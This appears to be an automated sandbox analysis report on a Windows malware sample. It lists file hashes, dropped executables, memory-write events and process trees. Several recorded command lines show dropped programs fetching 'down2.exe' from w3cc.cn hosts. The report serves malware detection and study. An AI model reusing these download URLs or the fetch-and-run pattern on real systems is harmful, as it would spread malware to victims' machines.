Analysis
max time kernel: 150s
max time network: 149s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 29/02/2024, 06:45
Static task: static1
Behavioral task: behavioral1
  Sample: adf042c909d919ccca72d1bcf7338e71.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: adf042c909d919ccca72d1bcf7338e71.exe
  Resource: win10v2004-20240226-en
General
Target: adf042c909d919ccca72d1bcf7338e71.exe
Size: 175KB
MD5: adf042c909d919ccca72d1bcf7338e71
SHA1: bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA256: 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512: d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173
SSDEEP: 3072:C5YS+FskKww99rNeht/ry7LOp9NxTzW8U6Ao1Tcfk8BIo8/qDjrlXZ4EhNWwH:CSvVtw/Ijy7SpPn7LFSjrlXZ4E1
Malware Config
Signatures
resource                                     yara_rule
behavioral1/files/0x000d000000013413-12.dat  aspack_v212_v242
Executes dropped EXE 5 IoCs
pid   Process
2928  yXvPpK.exe
2552  CjQlMj.exe
2172  McooHs.exe
1592  DsaQDn.exe
888   gpVDWz.exe
Loads dropped DLL 10 IoCs
pid   Process
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
2320  adf042c909d919ccca72d1bcf7338e71.exe
Drops file in System32 directory 8 IoCs
description                   ioc                                 Process
File created                  C:\Windows\SysWOW64\yXvPpK.exe      adf042c909d919ccca72d1bcf7338e71.exe
File opened for modification  C:\Windows\SysWOW64\yXvPpK.exe      adf042c909d919ccca72d1bcf7338e71.exe
File created                  C:\Windows\SysWOW64\CjQlMj.exe.tmp  adf042c909d919ccca72d1bcf7338e71.exe
File created                  C:\Windows\SysWOW64\McooHs.exe.tmp  adf042c909d919ccca72d1bcf7338e71.exe
File created                  C:\Windows\SysWOW64\DsaQDn.exe.tmp  adf042c909d919ccca72d1bcf7338e71.exe
File created                  C:\Windows\SysWOW64\DelCAD.bat      CjQlMj.exe
File created                  C:\Windows\SysWOW64\gpVDWz.exe.tmp  adf042c909d919ccca72d1bcf7338e71.exe
File created                  C:\Windows\SysWOW64\DelCAD.bat      McooHs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Runs ping.exe 1 TTPs 4 IoCs
pid   Process
2244  PING.EXE
588   PING.EXE
1268  PING.EXE
2852  PING.EXE
Suspicious use of WriteProcessMemory 44 IoCs
description                       pid   Process                               procid_target
PID 2320 wrote to memory of 2928  2320  adf042c909d919ccca72d1bcf7338e71.exe  28
PID 2320 wrote to memory of 2928  2320  adf042c909d919ccca72d1bcf7338e71.exe  28
PID 2320 wrote to memory of 2928  2320  adf042c909d919ccca72d1bcf7338e71.exe  28
PID 2320 wrote to memory of 2928  2320  adf042c909d919ccca72d1bcf7338e71.exe  28
PID 2320 wrote to memory of 2552  2320  adf042c909d919ccca72d1bcf7338e71.exe  29
PID 2320 wrote to memory of 2552  2320  adf042c909d919ccca72d1bcf7338e71.exe  29
PID 2320 wrote to memory of 2552  2320  adf042c909d919ccca72d1bcf7338e71.exe  29
PID 2320 wrote to memory of 2552  2320  adf042c909d919ccca72d1bcf7338e71.exe  29
PID 2320 wrote to memory of 2172  2320  adf042c909d919ccca72d1bcf7338e71.exe  31
PID 2320 wrote to memory of 2172  2320  adf042c909d919ccca72d1bcf7338e71.exe  31
PID 2320 wrote to memory of 2172  2320  adf042c909d919ccca72d1bcf7338e71.exe  31
PID 2320 wrote to memory of 2172  2320  adf042c909d919ccca72d1bcf7338e71.exe  31
PID 2320 wrote to memory of 1592  2320  adf042c909d919ccca72d1bcf7338e71.exe  35
PID 2320 wrote to memory of 1592  2320  adf042c909d919ccca72d1bcf7338e71.exe  35
PID 2320 wrote to memory of 1592  2320  adf042c909d919ccca72d1bcf7338e71.exe  35
PID 2320 wrote to memory of 1592  2320  adf042c909d919ccca72d1bcf7338e71.exe  35
PID 2552 wrote to memory of 1540  2552  CjQlMj.exe                            36
PID 2552 wrote to memory of 1540  2552  CjQlMj.exe                            36
PID 2552 wrote to memory of 1540  2552  CjQlMj.exe                            36
PID 2552 wrote to memory of 1540  2552  CjQlMj.exe                            36
PID 1540 wrote to memory of 2244  1540  cmd.exe                               38
PID 1540 wrote to memory of 2244  1540  cmd.exe                               38
PID 1540 wrote to memory of 2244  1540  cmd.exe                               38
PID 1540 wrote to memory of 2244  1540  cmd.exe                               38
PID 1540 wrote to memory of 588   1540  cmd.exe                               40
PID 1540 wrote to memory of 588   1540  cmd.exe                               40
PID 1540 wrote to memory of 588   1540  cmd.exe                               40
PID 1540 wrote to memory of 588   1540  cmd.exe                               40
PID 2320 wrote to memory of 888   2320  adf042c909d919ccca72d1bcf7338e71.exe  41
PID 2320 wrote to memory of 888   2320  adf042c909d919ccca72d1bcf7338e71.exe  41
PID 2320 wrote to memory of 888   2320  adf042c909d919ccca72d1bcf7338e71.exe  41
PID 2320 wrote to memory of 888   2320  adf042c909d919ccca72d1bcf7338e71.exe  41
PID 2172 wrote to memory of 848   2172  McooHs.exe                            43
PID 2172 wrote to memory of 848   2172  McooHs.exe                            43
PID 2172 wrote to memory of 848   2172  McooHs.exe                            43
PID 2172 wrote to memory of 848   2172  McooHs.exe                            43
PID 848 wrote to memory of 1268   848   cmd.exe                               44
PID 848 wrote to memory of 1268   848   cmd.exe                               44
PID 848 wrote to memory of 1268   848   cmd.exe                               44
PID 848 wrote to memory of 1268   848   cmd.exe                               44
PID 848 wrote to memory of 2852   848   cmd.exe                               46
PID 848 wrote to memory of 2852   848   cmd.exe                               46
PID 848 wrote to memory of 2852   848   cmd.exe                               46
PID 848 wrote to memory of 2852   848   cmd.exe                               46
Processes
C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2320

  C:\Windows\SysWOW64\yXvPpK.exe
    Command line: "C:\Windows\system32\yXvPpK.exe" showautoC:\Windows\system32\eMEgKoPo.dll
    - Executes dropped EXE
    PID:2928

  C:\Windows\SysWOW64\CjQlMj.exe
    Command line: "C:\Windows\system32\CjQlMj.exe" C:\Windows\system32\BygFkM2.exe http://x6.w3cc.cn/dw/down2.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:2552

    C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c C:\Windows\system32\DelCAD.bat
      - Suspicious use of WriteProcessMemory
      PID:1540

      C:\Windows\SysWOW64\PING.EXE
        Command line: ping -n 5 127.0.0.1
        - Runs ping.exe
        PID:2244

      C:\Windows\SysWOW64\PING.EXE
        Command line: ping -n 5 127.0.0.1
        - Runs ping.exe
        PID:588

  C:\Windows\SysWOW64\McooHs.exe
    Command line: "C:\Windows\system32\McooHs.exe" C:\Windows\system32\zcynDy2.exe http://x2.w3cc.cn/dw/down2.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:2172

    C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c C:\Windows\system32\DelCAD.bat
      - Suspicious use of WriteProcessMemory
      PID:848

      C:\Windows\SysWOW64\PING.EXE
        Command line: ping -n 5 127.0.0.1
        - Runs ping.exe
        PID:1268

      C:\Windows\SysWOW64\PING.EXE
        Command line: ping -n 5 127.0.0.1
        - Runs ping.exe
        PID:2852

  C:\Windows\SysWOW64\DsaQDn.exe
    Command line: "C:\Windows\system32\DsaQDn.exe" C:\Windows\system32\YwLroS2.exe http://x4.w3cc.cn/dw/down2.exe
    - Executes dropped EXE
    PID:1592

  C:\Windows\SysWOW64\gpVDWz.exe
    Command line: "C:\Windows\system32\gpVDWz.exe" C:\Windows\system32\kPcInM2.exe http://x2.w3cc.cn/dw/down2.exe
    - Executes dropped EXE
    PID:888
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 141B
MD5: 55ddc7c397dac5382bffc27028613cf2
SHA1: cd1ec3db09b2c87dbc12af0cee2e61c2811b7248
SHA256: 7af73cc02994867d8df3f7f35ba4b6533566fa66b0a332fcdd6154eaba8268f1
SHA512: bd47ce4081fda66661ac783618e3caf38c86012b669e25e10c376f696c468ac867f955f3ae33e4d9633df7c2ac7e5b9606f17064589343ba562cb8fe954b6026

Filesize: 141B
MD5: 3b9f74672e6599f4d582d25049c67775
SHA1: b07fea6b6986218b56665ff196295e53a1ab9028
SHA256: 60439805131c49c394e0a28e070e4a7ca6956eb3e0c3c7137d16993fa3217311
SHA512: 8791d98b7ab472d43595f1c85d4c21916eae04b294d8e1c1ed5685fb94d64b3e7236b1e917c784395f13c9ce9521df14978d3e6ecec21b1bb8ebf0f04569acfb

Filesize: 35KB
MD5: 78cd588e48bf05f83ac4d2e5bd3d32e2
SHA1: c96060325a397b397a1d60076ce6e2c11f309a4f
SHA256: 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
SHA512: 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65

Filesize: 175KB
MD5: adf042c909d919ccca72d1bcf7338e71
SHA1: bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA256: 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512: d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173